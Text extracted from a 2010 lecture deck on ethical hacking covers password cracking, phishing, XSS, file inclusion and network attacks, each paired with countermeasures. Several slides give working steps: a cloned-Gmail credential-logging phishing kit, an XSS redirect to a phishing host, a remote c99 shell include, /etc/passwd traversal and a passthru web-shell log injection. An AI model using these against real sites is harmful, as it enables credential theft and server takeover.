Upload
ajay-dhamija
View
145.351
Download
3
Embed Size (px)
Citation preview
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Ethical Hacking & Information SecurityAn Introduction
AK Dhamija
DIPR, DRDO
May 14, 2010
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 1 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Overview
1 IntroductionHacker
2 Password HackingLow Tech MethodsHigh Tech MethodsCountermeasures
3 Web HackingTechniquesCountermeasures
4 Network HackingTechniquesCountermeasures
5 Windows Hacking
6 Linux Hacking
7 Wireless Hacking
8 Malware
9 ReferencesAK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 2 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction
Computer Security : CIA (Confidentiality, Integrity,Authentication)
Computer Security
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 3 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction
Computer Security : CIA (Confidentiality, Integrity,Authentication)
Computer SecurityNetwork Security
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 4 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction
Computer Security : CIA (Confidentiality, Integrity,Authentication)
Computer SecurityNetwork Security
Information Security
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 5 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction
Computer Security : CIA (Confidentiality, Integrity,Authentication)
Computer SecurityNetwork Security
Information Securityare OXYMORONS
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 6 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction
Hacked Passwords
Top ten most-popular passwords (in that order) from among 32million hacked from RockYou.com123456, 12345, 123456789, Password, iloveyou, princess, rockyou, 1234567, 12345678, abc123
Imperva’s study of ”Consumer Password Worst Practices”
• About 30 percent of users chose passwords whose length is equal or below six characters.
• Moreover, almost 60% of users chose their passwords from a limited set of alpha-numeric characters.
• Nearly 50% of users used names, slang words, dictionary words or trivial passwords (consecutivedigits, adjacent keyboard keys, and so on)
Good Password Practices
• It should contain at least eight characters
• It should contain a mix of four different types of characters - upper case letters, lower case letters,numbers, and special characters such as #$%&*,;” If there is only one letter or special character, itshould not be either the first or last character in the password.
• It should not be a name, a slang word, or any word in the dictionary. It should not include any partof your name or your e-mail address.
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 7 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction
Hacked Passwords
Ditalee, Ditalee1, Ditalee3iambhiku
pareekshanh84*sha1973******
peter1hemant
love25786080176
kingoforkutiloveyou
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 8 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction Hacker
Hacker
What is a Hacker ?
Hacker
A hacker is someone who likes to tinker with electronics or computersystems : finding ways to make them do what they do better, or dothings they weren’t intended to do
Two types of Hacker
• White Hat :• Good Guys• Don’t use their skills for illegal purposes• Computer Security experts and help protect people from the Black Hats
• Black Hat :• Bad Guys• Use their skills maliciously for personal gain• Hack banks, steal credit cards, and deface websites
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 9 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction Hacker
Hacker Hierarchy
Hacker Hierarchy
• Script kiddies :• Wannabe hackers• Have no hacking skills and use the tools developed by other hackers• No knowledge of what’s happening behind the scenes
• Intermediate hackers :• Usually know about computers, networks, and have enough programming knowledge to
understand what a script might do• Use pre-developed well-known exploits (code that takes advantage of a bug or vulnerability)
to carry out attacks
• Elite Hackers :• skilled hackers• write hacker tools and exploits• break into systems and hide their tracks
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 10 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Introduction Hacker
Becoming Hacker
What does it take to become a hacker?
Qualities needed
• Creativity
• Will to learn
• Knowledge is power
• Patience
• Programming to be an elite hacker
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 11 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking Low Tech Methods
Old Fashioned Low-Tech Methods
Low-Tech Methods
• Social Engineering• Hacker takes advantage of trusting human beings to get information from them• e.g. a ploy to install a new security update on your computer
• Shoulder surfing
• Guessing• Week Passwords like date of birth, phone number, favorite pet etc
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 12 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
High Tech Methods
High Tech Methods
• Gmail system administrator’s automatic responder
• Dictionary Attacks
• Brute Force Attacks
• Rainbow Tables
• Phishing
• GX Cookies
• ARP Poisoning
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 13 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Gmail system administrator’s automatic responder
High-Tech Techniques : Gmail system administrator’s automaticresponder
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 14 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Gmail system administrator’s automatic responder
High-Tech Techniques : Gmail system administrator’s automaticresponder
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 15 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Gmail system administrator’s automatic responder
High-Tech Techniques : Gmail system administrator’s automaticresponder
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 16 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Dictionary Attacks
High-Tech Techniques : Dictionary Attacks
• a text file full of commonly used passwords, or a list of every word from the dictionary is used againsta password database
• Brutus, a very common password cracker
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 17 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Dictionary Attacks
High-Tech Techniques : Dictionary Attacks
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 18 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Dictionary Attacks
High-Tech Techniques : Dictionary Attacks
IP Masquerading, Anonymous proxy and switching proxies are thetechniques used to hide IP
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 19 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Brute-force Attacks
High-Tech Techniques : Brute-force Attacks
• With time, brute-force attacks can crack any passwords
• Try every possible combination of letters, numbers, and special characters until the right password isfound .
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 20 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Brute-force Attacks
High-Tech Techniques : Brute-force Attacks
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 21 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Brute-force Attacks
High-Tech Techniques : Rainbow Tables
• A huge pre-computed list of hash values for every possible combination of characters
• A hash is a one way encryption - MD5
• cheese through the md5 algorithm, would be fea0f1f6fede90bd0a925b4194deac11
• Having huge tables of every possible character combination hashed is a much better alternative tobrute-force cracking
• Once the rainbow tables are created, cracking the password is a hundred times faster thanbrute-forcing it
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 22 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Phishing
High-Tech Techniques : Phishing
• Stealing sensitive information, such as usernames, passwords, and bank information, by pretending tobe someone you’re not
• First the hacker chooses a target (Hotmail and Gmail)
• Go to www.gmail.com and click File − > Save page as ...
• Rename ServiceLogin.htm to index.htm
• PHP script that logs and stores your login details when you click ”Sign in”
• Save this script into the same directory as you saved the Gmail page, and name it phish.php
• Create a new empty text file and name it list.txt
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 23 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Phishing
High-Tech Techniques : Phishing
PHP Script
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 24 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Phishing
High-Tech Techniques : Phishing
• open up the main Gmail page named index.htm with notepad
• Look for first occurrence of the word ”action” in the script
• There are two ”action” occurrences in the script so make sure you have the right one by looking atthe ”form id” name above
• Change the link between action = ” ” to phish.php. This will make the form submit to your PHPphish script instead of to Google
• After the link you will see the code
• Change the word ”POST” to ”GET” so that it looks like method=”GET”. This submits theinformation you type so that the PHP script can log it
• Save and close the file
• Upload the files up to a free webhost that supports PHP
• change file permission of ”list.txt” to 777
• http://www.yourwebhosturl.com/youraccount/list.txt will give you the username and password
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 25 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
Phishing
High-Tech Techniques : Phishing
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 26 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
GX Cookies
High-Tech Techniques : GX Cookies
• Cookies are used by web browsers to store your user information so that you can stay logged into awebsite even after you leave. By stealing your cookie, the attacker can sometimes login withoutknowing your password
• When Users login into Gmail account, Gmail Server sends Cookie (A text file) to your browser
• This file helps Gmail server to know that you are authenticated. This Cookie will log-in you in for 2week unless you press sign-out or delete the Cookie
• Even though when you authenticated using SSL, after that you are also not secure because the resultreturn by the Gmail server is unencrypted connection.
• Every time you request anything from the Gmail server like an image, your browser sends this Cookiefile to Gmail server and any attacker can easily get this Cookie file by applying any network sniffertool
• After this attacker get your Gmail session ID and using this Session ID attacker can easily logged inyour Gmail account without the need of any Username and Password
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 27 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
GX Cookies
High-Tech Techniques : GX Cookies
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 28 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
ARP Poisoning
High-Tech Techniques : ARP Poisoning
• Address Resolution Protocol (ARP) is a Layer 2 protocol
• Allows an attacker to sniff data frames on a local area network (LAN), modify the traffic, or stop thetraffic altogether
• the aim is to associate the attacker’s MAC address with the IP address of another node (such as thedefault gateway)
• Any traffic meant for that IP address would be mistakenly sent to the attacker instead.
• The attacker could then choose to forward the traffic to the actual default gateway (passive sniffing)or modify the data before forwarding it (man-in-the-middle attack)
• The attacker could also launch a denial-of-service attack against a victim by associating anonexistent MAC address to the IP address of the victim’s default gateway
• ARP spoofing attacks can be run from a compromised host, or from an attacker’s machine that isconnected directly to the target Ethernet segment
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 29 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking High Tech Methods
ARP Poisoning
High-Tech Techniques : ARP Poisoning
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 30 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking Countermeasures
Password Hacking
Countermeasures
Social Engineering• Ask some questions that he should be able to answer to establish his legitimacy.
• Some professionals study the company before attacking, so they might know all the answers.
• In case of doubts, you should ask the head of whatever department the attacker is from
Shoulder Surfing• Make sure there is no one behind you attempting to peak
• Don’t keep any sticky notes laying around that have your password or password hints on them
Guessing• Never use a password like your birth date, your mother’s maiden name, your pets name, your
spouse’s name, or anything that someone may be able to guess
Gmail system administrator’s automatic responder• Don’t fall prey to such tatics
• Don’t respond to mails, if you can’t identify the sender
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 31 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking Countermeasures
Password Hacking
Countermeasures
Dictionary Attacks• Don’t use a password that is in the dictionary
• If you use a word from the dictionary but replace most of the letters with a number, you are not safe.1337 speak dictionary is changing a word like ”animal” to 4n1m41
• Use something like doyoulikecheese?88
Brute-force Attacks• Creating a very long password and using many numbers and odd characters
• Creating a phrase for your password is your best option for staying secure
Rainbow Tables• Creating tables for passwords that are long takes a very long time and a lot of resources
Phishing• Beware of gmail.randomsite.com, or gamilmail.com
• When you are on the real Gmail website, the URL should begin with www.google.com anything elseis a fake
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 32 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking Countermeasures
Password Hacking
Countermeasures
GX Cookies• Do not use Gmail from public places, cybercafe and public wireless hotspots
• Always use https://mail.google.com because this will access the SSL version of Gmail. it will bepersistent over your entire session and not only during authentication
ARP Poisoning• Static ARP inspection (SARPI) or dynamic ARP inspection (DARPI) approach on switched or
hubbed LANs with or without DHCP
• Always use https://mail.google.com because this will access the SSL version of Gmail. it will bepersistent over your entire session and not only during authentication
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 33 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Password Hacking Countermeasures
Password Cracking
Other Programs
• Cain and Abel
• John the Ripper
• THC Hydra
• SolarWinds
• RainbowCrack
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 34 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking
Web Hacking
Techniques
• Cross Site Scripting (XSS)
• Remote File Inclusion (RFI)
• Local File Inclusion (RFI)
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 35 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking Techniques
Web Hacking
Cross Site Scripting (XSS)
• User inputs malicious data into a website
• Affected Sites FBI, CNN, Ebay, Apple, Microsft, and AOL
• features commonly vulnerable to XSS attacks are• Search Engines• Login Forms• Comment Fields
• Three types of XSS attacks• Local
• Rarest & hardest to pull off• Requires an exploit for a browser• hacker can install worms, spambots, and backdoors onto your computer
• Non-Persistent
• most common types of attack and don’t harm the actual website• A client side script or HTML is inserted into a variable which causes the output that
the user sees to be changed• Only activated when the user visits the URL crafted by the attacker
• Persistent
• Steal website cookies• Deface the website• Spread Worms
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 36 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking Techniques
Cross Site Scripting (XSS)
XSS : How can we say whether the site is vulnerable• If there is a search field, enter a word and if that word is displayed back to you on the next page,
there’s a chance it is vulnerable
• Search for < h1 > hi < /h1 >, and if the word ”hi” is outputted as a big header, it is vulnerable
• Search for < script > alert(”hi”);< /script > , if the word ”hi” pops up in a popup box,then the site is vulnerable to XSS
• These examples are non-persistent. Now if the hacker finds a guestbook etc, he can make itpersistent and everyone that visits the page would get the above alert if that was part of his comment
XSS for PhishingWe want to craft a link pointing to the legit website (www.victim-site.com) that redirects to phishing website
• when JavaScript is inserted into the search box, a URL was formed that looked like
• the code we typed into the search box was passed to the ”searchbox” variable
• Replace everything in between ?searchbox= and &search with JavaScript code< script > window.location = ”http : //phishing − site.com” < /script >
• Now when you go to the finished link, the legitimate site will redirect to the phishing website.
• Encode the URL to make it look more legit - http://www.encodeurl.com/
• It may look something likehttp%3A%2F%2Flocalhost%2Fform.php%3Fsearchbox%3D%3Cscript%3Ewindow.location+%3D+%5C%22http%3A%2F%2Fphishing-site.com%5C%22%3C%2Fscript%3E%26search%3Dsearch%21
• Once the victim sees that the link points to the legitimate website, he will be more likely to fall forthe phishing attack
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 37 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking Techniques
Remote File Inclusion (RFI)
RFI : How can we say whether the site is vulnerable• A remote file, usually a shell is included into a website which allows the hacker to execute server side
commands as the current logged on user, and have access to files on the server
• Many servers are vulnerable to this kind of attack because of PHP’s default settings ofregister globals and allow url fopen being enabled
• PHP 6.0 onwards, register globals has been depreciated
RFI : Exploiting the vulnerability• First the hacker would find a website that gets its pages via the PHP include() function and is
vulnerable to RFI.
• Many hackers use Google dorks to locate servers vulnerable to RFI.
• A Google dork is the act of using Google’s provided search tools to help get a specific search result.eg allinurl : .php?page = looks for URL’s with .php?page = in them
• To get relevant sites, Switch around the word ”page” with other letters and similar words
• Hackers usually search vulnerability databases like www.milw0rm.com for already discovered RFIvulnerabilities in site content management systems and search for websites that are running thatvulnerable web application with a Google dork
• Website that include pages have a navigation system similar to:http : //target− site.com/index.php?page = PageName
• To see if a the page is vulnerable, the hacker would try to include a site instead of PageName likehttp : //target− site.com/index.php?page = http : //google.com
• If the Google homepage shows up on the website, then the hacker knows the website is vulnerableand would continue to include a shell
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 38 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking Techniques
Remote File Inclusion (RFI)
RFI : Exploiting the vulnerability• Most popular shells are c99 and r57. A hacker would either upload them to a remote server or just
use a Google dork to locate them already online and insert them (search inurl:c99.txt)
• This will display many websites with the shell already up and ready to be included. At the end of theURL make sure to add a ? so that if anything comes after c99.txt, it will be passed to the shell andnot cause any problems.
• The new URL with the shell included would look likehttp : //target− site.com/index.php?page = http : //site.com/c99.txt?
• Sometimes the PHP script on the server appends ”.php” but ”c99.txt.php” would not work.
• To get around this, you would add a null byte (%00) to the end of c99.txt. This tells the server toignore everything after c99.txt
• If the hacker succeeds in getting the server to parse the shell, he will be presented with a screen
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 39 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking Techniques
Remote File Inclusion (RFI)
RFI : Exploiting the vulnerability• The shell will display information about the remote server and list all the files and directories on it.
• From here the hacker would find a directory that has read and write privileges
• Upload the shell as a .php file so that incase the vulnerability is fixed, he will be able to access itlater on
• Root privileges become vulnerable now by uploading and running local exploits against the server
• He could also search the victim server for configuration files. These files may contain username andpasswords for the MYSQL databases etc
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 40 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking Techniques
Local File Inclusion (LFI)
LFI : How can we say whether the site is vulnerable• when you have the ability to browse through the server by means of directory transversal (discover
the /etc/passwd file)
• Vulnerable sites are found similar ti RFI(www.target− site.com/index.php?p = ../../../../../../../etc/passwd)
• /etc/passwd file would display each line as username:passwd:UserID:GroupID:full name:directory:shell
• eg Root:x:0:0::/root:/bin/bash
• If the password hash was shown, the hacker would be able to crack it and get access to the machine
• if password is shadowed and in the /etc/shadow file which the hacker doesn’t have access to, thenhe may get access to the system through log injection
• The log directories are located in different areas in different Linux distributions (find error.log,access.log, error log, access log etc)
LFI : Gaining access to the system through log injection• Search for OS version the target server then search where the log files are located on that OS
• The hacker would then inject some PHP code into the logs by typing<? Passthru($ GET [′cmd′]) ? > after = in the URL
• This will cause the PHP script to be logged because there is no file by that name. This script willgive the hacker shell access and allow him to execute system commands
• if you go back to the log file, you will see that PHP script wasn’t parsed and instead converted to%3C?%20passthru($ GET [cmd])%20?%3E
• When we submitted the script, the browser automatically encoded the URL. We can use a pearlscript that can get around this problem.
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 41 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking Techniques
Local File Inclusion (LFI)
LFI : Gaining access to the system through log injection• Edit the variables: site,path, code, andlog to the appropriate information
• Once the hacker runs this script and it goes successfully, he can run any command on the server.
• From here he can run any local exploits to gain root, or just browse the server files
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 42 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Web Hacking Countermeasures
Web Hacking
Countermeasures
• Make sure you are using up-to-date scripts
• Make sure you server php.ini file has register globals and allow url fopen disabled
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 43 / 56
EthicalHacking &Information
Security
AK Dhamija
Introduction
Hacker
PasswordHacking
Low TechMethods
High TechMethods
Countermeasures
Web Hacking
Techniques
Countermeasures
NetworkHacking
Techniques
Countermeasures
WindowsHacking
Linux Hacking
WirelessHacking
Malware
References
Network Hacking
Network Hacking
Techniques
• Foot Printing
• Port Scanning
• Banner Grabbing
• Searching for Vulnerabilities
• Penetrating
AK Dhamija (DIPR, DRDO) Ethical Hacking & Information Security May 14, 2010 44 / 56
EthicalHacking &Information
Security
